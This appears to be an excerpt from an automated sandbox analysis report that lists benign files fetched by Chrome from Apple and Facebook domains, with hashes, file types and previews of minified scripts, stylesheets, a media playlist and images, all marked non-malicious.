                                                                                                                                                                                                                                URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8
                                                                                                                                                                                                                                Preview:#EXTM3U.#EXT-X-TARGETDURATION:6.#EXT-X-VERSION:7.#EXT-X-MEDIA-SEQUENCE:0.#EXT-X-PLAYLIST-TYPE:VOD.#EXT-X-INDEPENDENT-SEGMENTS.#EXT-X-MAP:URI="P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4",BYTERANGE="822@0".#EXTINF:5.99075,..#EXT-X-BYTERANGE:95176@822.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102413@95998.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:97049@198411.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:96885@295460.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:5.99075,..#EXT-X-BYTERANGE:102639@392345.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXTINF:0.11014,..#EXT-X-BYTERANGE:367@494984.P875466468_Anull_audio_en_gr128_mp4a-40-2-.mp4.#EXT-X-ENDLIST.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (20738)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):86597
                                                                                                                                                                                                                                Entropy (8bit):5.7667639352954785
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:1S6F7vZeqFfh5kVEgpEI9Ps9Zlv4o5Iq7mGsq53Jttzp5QOyo:1S6F7vZeqNh5wEqFPKlvB9go
                                                                                                                                                                                                                                MD5:6B7F0B1E0AF3E89F3D580DFB2E84082B
                                                                                                                                                                                                                                SHA1:C3352E72C4CD682DF4B4DD8F14AD013578FC04CB
                                                                                                                                                                                                                                SHA-256:1B03380EF0ED1C355563B423B11292507D9B0DF47FD1110D1E20A2A370AEB580
                                                                                                                                                                                                                                SHA-512:164E81E1A9F7D6DC82AE2E627202908AB9ED3EC8EA2F9CDFD94206D8A19808A7DBEE461B303F41E45D95E7867327A5BEC17B569382008A7A427F4C639772C89F
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iOos4/yj/l/en_GB/kM7FcjXTwOM.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsGetAdsHelpTrayOpenOnClick",["AdsHelpTrayUIActions","AdsHelpTrayUIProvider"],(function(a,b,c,d,e,f,g){"use strict";function a(a){var b=a.dialogWidth,e=a.forceNewWindow,f=e===void 0?!1:e,g=a.helpCenterID,h=a.source,i=a.onClick;return function(a){var e=f;if(b!=null){var j=b+c("AdsHelpTrayUIProvider")().helpTrayOpenWidth*2;window.innerWidth<j&&(e=!0)}e||(a.preventDefault(),a.stopPropagation(),d("AdsHelpTrayUIActions").pushCMSIDToHistory(g,h));i&&i(a)}}g["default"]=a}),98);.__d("AdsLearnMoreStrings",["fbt"],(function(a,b,c,d,e,f,g,h){"use strict";a=h._("Learn more");b=h._("Learn more");c=h._("people");d=h._("Learn more about Meta placements");e=h._("Learn about audience.");f=h._("Learn more about attribution settings");g.INLINE_LEARN_MORE=a;g.STANDALONE_LEARN_MORE=b;g.INLINE_PEOPLE_TEXT=c;g.PLACEMENTS_LEARN_MORE=d;g.INLINE_LEARN_MORE_ABOUT_AUDIENCE=e;g.INLINE_LEARN_MORE_ATTRIBUTION_SETTINGS=f}),226);.__d("GeoInvertedThemeProvider",["GeoPrivateInvertThemeContext","
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (64931), with no line terminators
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):1026854
                                                                                                                                                                                                                                Entropy (8bit):5.432328737065219
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:Ot0Ebp2itYQmgTWjEjd8KFIVChBVbIjvOmCC/fwUEsyt4WKNDWheDQ:jitYQmgTjaWKNDWhl
                                                                                                                                                                                                                                MD5:E9A842DD9CAE1CD67C519821313E0F30
                                                                                                                                                                                                                                SHA1:ED37B1FF89B7DF2D7D8A9DB458481219A5867516
                                                                                                                                                                                                                                SHA-256:1A10C0BA8A34CD552FD7D187FFAFC9392B89FA7C75BF19C26A3CB9C5AE6D9F47
                                                                                                                                                                                                                                SHA-512:999DF388461F6033040E65C80D4499F162300C6184EA75373049E7D4A9EAC8611391459FE98EFB32E91FDA33A3A5F79FEE2B48A3C42F65C449B0924C17EF64EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/web-experience-app-real-e9a842dd9cae1cd67c519821313e0f30.css
                                                                                                                                                                                                                                Preview:@charset "UTF-8";#localnav-viewport-emitter{overflow:hidden;position:absolute;top:0;left:0;width:0;height:0;visibility:hidden;z-index:-1}#localnav-viewport-emitter::before{content:"ac-localnav:large"}@media only screen and (max-width:1023px){#localnav-viewport-emitter::before{content:"ac-localnav:medium"}}@media only screen and (max-width:767px){#localnav-viewport-emitter::before{content:"ac-localnav:small"}}.localnav{position:relative;top:0;left:0;width:100%;height:52px;min-width:1024px;z-index:9997}@media only screen and (max-width:1044px){.localnav{min-width:320px}}.localnav.localnav-stacked{height:66px}@media only screen and (max-width:767px){.localnav{height:48px}.localnav.localnav-stacked{height:63px}}.localnav-overlap .localnav{margin-bottom:-52px}.localnav.localnav-stacked .localnav-overlap .localnav{margin-bottom:-66px}@media only screen and (max-width:767px){.localnav-overlap .localnav{margin-bottom:-48px}.localnav.localnav-stacked .localnav-overlap .localnav{margin-bottom:-6
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):805933
                                                                                                                                                                                                                                Entropy (8bit):5.389545949651775
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:n8rP4RAXuhh2O0NVIWaAPngBeM4zULaDnNfkt6:neP4RAwh2O0NVIWaAPngBeM4zULaDnNr
                                                                                                                                                                                                                                MD5:FEDF0A7355DA0EC2FD483C6269EDE396
                                                                                                                                                                                                                                SHA1:3C16C7280C72CC23FB3E457F819A247F19C2D70B
                                                                                                                                                                                                                                SHA-256:D21C20E127D8A461CF2D71D3004C0A00D721AC2510A0C4D930F5E7394B251540
                                                                                                                                                                                                                                SHA-512:BA3440DD37005534DC400E900A88732EF6A6E1D5435DC9DCE020A7FA909FAEA6A52BAA6F915E165975FCCA878B0F14C9823D53CD5EFD4870C2B93F8BF6AD62DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://js-cdn.music.apple.com/hls.js/2.610.3/hls.js/hls.js
                                                                                                                                                                                                                                Preview:/*! For license information please see hls.js.LICENSE.txt */.!function hy(py){const my=this;var e,t;e=this,t=function(){"use strict";var he,Q,K,e=e=>e&&e.Math===Math&&e,l=e("object"==typeof globalThis&&globalThis)||e("object"==typeof window&&window)||e("object"==typeof my&&my)||e("object"==typeof global&&global)||Function("return this")();class b extends Error{constructor(e,t,i,r,n,a){super(n),this.type=e,this.details=t,this.fatal=i,this.response=r,this.handled=!1,a&&(this.stack=a),n&&(this._message=n)}get message(){return this._message||(this._message=this.constructor.name+` code=`+this.response),this._message}}class pe extends b{constructor(e,t,i,r,n){super(e,t,i,r,n),this.response=r}}class d extends b{constructor(e,t){super(he.NETWORK_ERROR,Q.CERT_LOAD_ERROR,!1,e,t)}}const H={PlaylistNotReceived:-12884,CryptResponseReceivedSlowly:-16833,LivePlaylistUpdateError:-12888,NoResponseFromMediaRequest:-12889,IncompatibleAsset:-12927,CorruptStream:-16041,InternalError:-12645,CantSwitchInTime
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):95
                                                                                                                                                                                                                                Entropy (8bit):4.381705050636977
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3sdsXxqtQAltjp:6v/lhPfkCDtmywFWsXxWVXjp
                                                                                                                                                                                                                                MD5:39C11D656220EFD52F4965400D14900A
                                                                                                                                                                                                                                SHA1:327050099CEE8D1AD81E7BFBE5CA2EA057780A87
                                                                                                                                                                                                                                SHA-256:C0F9968D0FA5F4DEFF86BABCCD6DF52306138314607A6F3F0ACD2E7AFC783D1C
                                                                                                                                                                                                                                SHA-512:B64595AD189620EA7A10715B0F84C30134CAA4BAB0F7FBA8E53438577BD33310939F2B4FACCC4D7152A3B279B641436E84211DB06FA9DB50FC0E9A1E83760B63
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS..31x....IDAT..c`........5.....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (11083)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):47925
                                                                                                                                                                                                                                Entropy (8bit):5.63694271144091
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:+BtmzebYJGgouKpwSfsbfjgBdtcI1hDRm+YTgfLFLZBk/cNxnOjMNBHLys14WXLb:WLf/0wtcIvPL9Pk/cNBxLys14WXB5H
                                                                                                                                                                                                                                MD5:A1E5572AB20DA021985F5FA17C38D4F3
                                                                                                                                                                                                                                SHA1:45E35F3D5778133577DD5F8F75E7648A08363688
                                                                                                                                                                                                                                SHA-256:71C88C8EB2871184AA06D114FCB5DD2DFB33D22611D48F15C5B2FCD427BD263C
                                                                                                                                                                                                                                SHA-512:54A43382CACB11813F55A7DF4D8A01C5E35C3F3CE0E3C6FCF2466F667F44E40F62F5E3E38D2F37F7CCDF105A66A802C388F6CEA5B150E9DFE82B1672EC461AD6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CometDensityAwarenessContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=!1;c=a.createContext(b);g["default"]=c}),98);.__d("CometGroupsPathingFunnelLogger",[],(function(a,b,c,d,e,f){"use strict";function a(a){switch(a){case"1635855486666999":return"REACTION_MENU_LIKE";case"1678524932434102":return"REACTION_MENU_LOVE";case"478547315650144":return"REACTION_MENU_WOW";case"115940658764963":return"REACTION_MENU_HAHA";case"908563459236466":return"REACTION_MENU_SORRY";case"444813342392137":return"REACTION_MENU_ANGER";case"613557422527858":return"REACTION_MENU_SUPPORT";default:return void 0}}function b(a,b,c){return}function c(a){return}function d(a,b){return}function e(a,b,c){return}function g(a){return}f.getReactionQPLPointFromReaction=a;f.start=b;f.addPoint=c;f.addSharedPoint=d;f.addEventSharedPoint=e;f.endCancel=g}),66);.__d("CometImageFromIXValueRelayWrapper_sprite.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11794
                                                                                                                                                                                                                                Entropy (8bit):7.981205654531022
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:h0QcbTomyT/d9M2QYEcUc6GgVVYBOLMwHCG+1vm3cutU41HVHvEbN9Oslv0cE8Bu:h0smyzw2QPJGgz9V+5m3cwxzHcbNNlvw
                                                                                                                                                                                                                                MD5:66E3AA84063184FE950C811E70715E7E
                                                                                                                                                                                                                                SHA1:3E71B81A617DCBEF5939E1DABC487A8FF1F06996
                                                                                                                                                                                                                                SHA-256:9E79717DE830CE55822C38DA925539643224A08C1B7C8F7B21F92CE0EA77DCEB
                                                                                                                                                                                                                                SHA-512:642E18C209D4060D481E947B4FE3C8C5615EAAEA1F4EC98E82EDC8D4B488F07714A68FC617DAD453959A2D8D3C590FA170263C526FF2C1675EA2C5E105BF1944
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 .-.......*....>.L.I$"(.)]...D.....>...#.z?._....4........s..././.v..}..^<.j.......r.....[......=j..~.............._z...........+....A}.....U.<.........>C.a.'./.?....J..v....B=..../.OL...".;....o............O...7.....>......u....|wp.....Z.'.Hj.Y..Q.-4!....r.....X.E..Z....t...[B^-q.R..7..{..Z.@.B..g+.K........w.Y^...V[...<...\....@_.".-..A.Y@^.-...m.`..%q....M2....{n..a.3....b..C....}..x\$?.3..8T..$b..z.!B......4.3..L.k.T..G..s>.3R.hA.P.V..G..\M...a.MI]a.,.....k.."............#.;............lc.../...._.,TW...a_...o..._...Z........[H.f.3...W..L..6..7.3. .T..o..XF.&.3..Z.a.t.b#...V..G...`l..nB.....=.b.>....!.m.;1QA..M}....\"8Od1..Z]...U."$m.~.;......%ue...\....C..*....1.$.O...W.Z..18..4...m;;..z..o]....qT.....)I.O..@H.@&..i.j.d.6..Rt*UW*e..`.e.......q2.(.r.k.*.hB.|X)*.z._......-.-...SHT....^\b..."....r ..ZU...x..Y..6..A.Y.......k.V.Q.k...a.V..H..gT...u..9....b.~.1..[8...M........)...R..QsV....m..y.[....@.{
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):686
                                                                                                                                                                                                                                Entropy (8bit):7.598746043153558
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:3Wgb1D5zUWvKZPlpLC4U1KZmipXyg5iLUl9KQhoMQdHtLPhW7UdvnMoO6IBHhpW:3zDWlpu4U1KRL91mHAUdv70HW
                                                                                                                                                                                                                                MD5:7B84B8DD3AF91F4EFB81F14311422377
                                                                                                                                                                                                                                SHA1:ACDB0366714033A533A8E3F7C7C2518F8922C9F6
                                                                                                                                                                                                                                SHA-256:3994FA5DC726B6D4449BDE23EF495775D259E7B6086161AC379AEE60B5887A14
                                                                                                                                                                                                                                SHA-512:168C3BA1434E4FE56BF6E421C6F98A5C4645D2BF335586FEFC76E5A2547247A97F76C4F948C79B8DC2206E06EB2B68C4FD93ADE7E224121199C79ED83A049452
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../?....%j..I.?..\qe...m.m..m..........E.......g.z..{..?z.8^.=s..q.&..G......0&...??.m.1gn.."2.....8..v..Wu.....H.W..,..%(..:.~Z..P....z..~O.h..u...F..X.0GB...3@..+...:...vb.5.R......-.+..S.....@.Xw.>."U..o..-.:.....j.i1...lI0p...8=....@.Xw...X.J2......&/..O..d.Y..v....x... 5.D5=J.....?..w.`O(q...`oE.B.##.}..d.s].O.j.d...5...y...3...]D...BY.7...b..FV..Uk...q\..>.X...t.j....+..D}ezP.cW..D>T3...+M...'TS.I...;..3I>.M.5.'DDf....`.......w......Wu..^4I.r.+z...T.{,m."l..d5......)._.....w..6..@.!s..7.%.$...MD....5.\....Jp..............t.b..k.........>-.7).~.....X..RP....7.b,k..Yh.I..-..l....Y...J-.Jl.U{I.[....(.{....h.BViYQ...3....
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (9869)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10413
                                                                                                                                                                                                                                Entropy (8bit):5.257533978847801
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:8nla2OCNzv/zCPfx1WY6Q8X4tYPNF9cxi3/lpemo+AW4mr+oaq5:8nl3OCRvbIfxkgUPRcxw/lpemoPW4mrb
                                                                                                                                                                                                                                MD5:1B5686244F6C6516B3C0CB73B85DEB30
                                                                                                                                                                                                                                SHA1:207E5F9CC6C80B1B84C18CDFA732A5C3CC43AE2B
                                                                                                                                                                                                                                SHA-256:3A91FF301DBC45B9035E65C7CACB68C5C06105196AB82BDE6AD6970348F2D819
                                                                                                                                                                                                                                SHA-512:73AC415260CAA2291E3F2A24393B226E1275A1981775E3AA4183B2ECC941872AEB3F1024756479FD56E26F3E27976607E576A835864892F547E17DA17A3B6A32
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{d as e,N as a,w as i,p as t,b as o}from"./p-1ec6e574.js";import{g as l}from"./p-42d04e97.js";(()=>{const o=Array.from(e.querySelectorAll("script")).find((e=>new RegExp(`/${a}(\\.esm)?\\.js($|\\?|#)`).test(e.src)||e.getAttribute("data-stencil-namespace")===a)),l={};return"onbeforeload"in o&&!history.scrollRestoration?{then(){}}:(l.resourcesUrl=new URL(".",new URL(o.getAttribute("data-resources-url")||o.src,i.location.href)).href,t(l))})().then((e
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10953)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):151566
                                                                                                                                                                                                                                Entropy (8bit):5.39929251490803
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:JKzpzSVqQwMTqHD+yOGJLlViLRbrnCefvgYeMhroycP:JezSsfLlieP
                                                                                                                                                                                                                                MD5:BC987911D4BED722BE159E8E4A955EE4
                                                                                                                                                                                                                                SHA1:0637F70A3D1C00CDCDA780B9ACC21EA998E75AC7
                                                                                                                                                                                                                                SHA-256:C31B9CE3C5C30304DD4F59649186764B75FED6F28059104C605A4F8FDC5CC2B5
                                                                                                                                                                                                                                SHA-512:F7440F9E947479402466655BE6C26B11E0A39CE331B958EAE9BB65051ABEAC56407AA40EE29AF9B54F4725DECD8E82FCD1CB627D94641307446A541279CFABEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsBrowserExtensionErrorUtils",["isFalsey"],(function(a,b,c,d,e,f,g){"use strict";var h="chrome-extension://";function a(a){a=a.split(h);a=a[a.length-1];return a.split("/")[0]}function b(a){return!c("isFalsey")(a)&&a.indexOf(h)>-1}g.CHROME_EXTENSION=h;g.extractExtensionID=a;g.isBrowserExtensionError=b}),98);.__d("LaminarDebugger",["EventEmitter"],(function(a,b,c,d,e,f,g){"use strict";var h="DEBUGGER";a=function(){function a(){this.$1=[],this.$6={},this.$3=100,this.$2=new Array(this.$3),this.$4=new(c("EventEmitter"))(),this.$5=!1}var b=a.prototype;b.getDebuggerActionDispatchQueue=function(){return this.$2};b.addSnapshotToDebuggerActionDispatchQueue=function(a){this.$6=a.newState,this.$4.emit(h,a),this.$2.push(a),this.$2.shift()};b.updateCaptureRate=function(a){a>0&&(this.$2.length+=a-this.$3,this.$3=a)};b.addDebugListener=function(a){return this.$4.addListener(h,a)};b.removeAllDebugListeners=function(){this.$4.removeAllListeners(h)};b.getPauseActionDispatches=fun
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10850
                                                                                                                                                                                                                                Entropy (8bit):7.975671955265493
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:xmG7orlt9U6+7/cWgN2ZPM/wMzJcRFxivdPDSr+Tazqt7s/sgHRKUjfAGAeseF0Y:sOwltaF/pgEZwNcxfrz8s0g8UjfAGZlR
                                                                                                                                                                                                                                MD5:DF4F4BD424E27B3EEFF5DFF4D4B5A82A
                                                                                                                                                                                                                                SHA1:00EDCBC57BE597D1431AA7388E91F2DA24DA141F
                                                                                                                                                                                                                                SHA-256:E929EE6594A82B80C5463DCFD43E675919595DA8E52D097EC52CD709A8E80FFA
                                                                                                                                                                                                                                SHA-512:8BB27E44C60312587C143E0F83F4CDB1DBCF8532E49408C03DCBA3D3C6DFC5EE4679B9E8F9E98C9876F3653450B9FC663AEB2E44B65031BC0F159236DD3147E8
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFFZ*..WEBPVP8 N*.......*..(.>]$.E#.!.Z..8...8....9....................?........G.......?G............j?.?.........{......e......._Z/............'.....?.....7.......o......@?.u..S..l...(|..c..k?..k.}.;...z)..........'.#.?...z..9.......OV].........}O.O.O..I......G.7...g./.....>j.I...c...g>.?..^.s.....O.?M.....K.c..?.?.?.~S...-.......O....n..?...b..~... .*... ]...U'.......1...-.........(.G1M.(.Q...%......7v.6...AX..61..[.e0....j...m0C..;0.!........Q....c.-.T...q.9..s........$E..!..f...O.-....9....~fc.?....#......}.d.}d.g..4mDs.2.F..r...b.H....:..q......k`?..f........&...]4.... .u.l.)...X]..u.E}}.u..d.......R....u..s..|...`.)=.<P......t.HpA.b...._f..A)..z..2.v..).w)r.4.P.jb:.....o..k..YC....7....P..|.....FoaR...v..nS>...-.W|..,~H......5...b\.a..........YlM(.`/.q.H...H^..IS8.E..nj...BI.....Ll.QWtJ|.h|.Xp.{a.,kK.e(....T..<..2*$...W}.v.".G.%.!..G."...O.:..k..\..R..g.Jo.....!I4....[.......B..df.......Q..p.l.K.......y{B{>....y.{..>Y$....L
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1306
                                                                                                                                                                                                                                Entropy (8bit):7.741913947586124
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:DfjVw7DmllyXwYwFtNPkorlg3Hp8iIvx3vQEBQN9fBioZwAGYNLdYqhjGKXS078P:jymuXwYwfNP554Hp8Jvx3oEyNnvGQdYl
                                                                                                                                                                                                                                MD5:6390D440E17A073C2ABEFC221B291143
                                                                                                                                                                                                                                SHA1:2A0B2190E567E9E57713FC0515080FF694E87F4F
                                                                                                                                                                                                                                SHA-256:914D2E825037CE7AFB8B31F5F3ABF18C345952B4C3FBC23C28B3C8BA37949C94
                                                                                                                                                                                                                                SHA-512:64C0D0D1D7C0582B7A6651E1D7CFF2B239390DACE349B063E7467DE0E0AD527AA33DEA25181C4B79F671F58649AE85A9D5944EA18C6B64A80AD44B90D969D7F3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 ....P....*....>.H.H#"..Z..4.D....1D...........7.y.z8.p...o.3.`.m.1.v..h..F........LY..5.D.%.....f........Zm,rzG....+!..-..?.$V...."....[.s.0G.i....G...}.~..z>.j.-.D.......f.V..@...2.|.....^.U.*.W......rC.<=............=c..w..Q_.tK.n.Z..f...e._...w..G..r 2Y..6.Q..P.....$p...?6....g...J.D........!.#.R..N...Qd....L<.V....5......./>.*j..M..C.8Z...b.......*~.M.?....0u.>"U.g5]'G.h.N.....w.9....hq..b:.@..Qk....~...L...........K/.Y.N._..#....C.K/....a......`..MU..S......t ..X....[...?......mE`.AZ\.wu...k.O%.D!;L........H.......'..q.b.........;O95a.@leI..A.....25.l..C.....h.T5...g(.9..a...F.n....4JLg.2..lu...G.fN.c.{<G.z-..7.N.KK.;1.=2..'..y.W.(.^.`.l....0..........B.....#.u..P.6W..-/.Iu.I. /.......cc..0.!w..u3.[.P.~....fbi........<..r....!...!..+.....U....;...*)....v(.Vx.e.s..../;.8. .....&.0.....Yc..x.`.2_.v.;kh........}.M....K.._..|..j|8O.l.f......@n..+H ..i./..z..P(&Zr....Gm..FsVR.z..kZo2......x.C..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3861)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):31218
                                                                                                                                                                                                                                Entropy (8bit):5.324429260638175
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:so/MPtWU9Ywx3UpxbY/Y3YOgQxnYeYZYHYZYVY+Y2mSSivJjne2vh1eA+HZzqmPl:RIT7hsZwuvLN54WAclQq2
                                                                                                                                                                                                                                MD5:E5448D39933BC347B40C9F54492F32A1
                                                                                                                                                                                                                                SHA1:DB96BDCCF87D3E1EDFB898604D7A0F5C40D0B430
                                                                                                                                                                                                                                SHA-256:C41ECBD066B65704841824817C3F5EB24077B8D2CFB2DF5C2550D45467C4A299
                                                                                                                                                                                                                                SHA-512:E6724DB597500FFE1DAF103837D93D63102A94CD318076670E7D0A958766B0152CEDB5900EF21587DD36C3ACC9F6FBA6BF80A2CA1F866CC811E6C34DBD0B3058
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (7012)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):356545
                                                                                                                                                                                                                                Entropy (8bit):5.454861144884858
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:XV3slatr7uVNns/Rc+uojzJ5C/BRtJV5nitT6GTC7ayZZA2lcdbZiiFxEytmt7mj:V4iSojzeGteGnEKhU3CQP72nf
                                                                                                                                                                                                                                MD5:778ECE954A9E68DBC21EDF9E76375090
                                                                                                                                                                                                                                SHA1:4B2E19048473B40CEE1DF910EA80838A858FD8C4
                                                                                                                                                                                                                                SHA-256:409AF97CC8E49345E77762389C4A27C44E780DE7A3AEDBEF0A01CC8A15E19248
                                                                                                                                                                                                                                SHA-512:220431866C7F0ABB585E0D5F99C023453EFA9A01F303EE6EA2C65E083CCBCE37FFB4D84DD51BC254FCB9B89401303E4AA3614D414D08643B2825527F78266B11
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
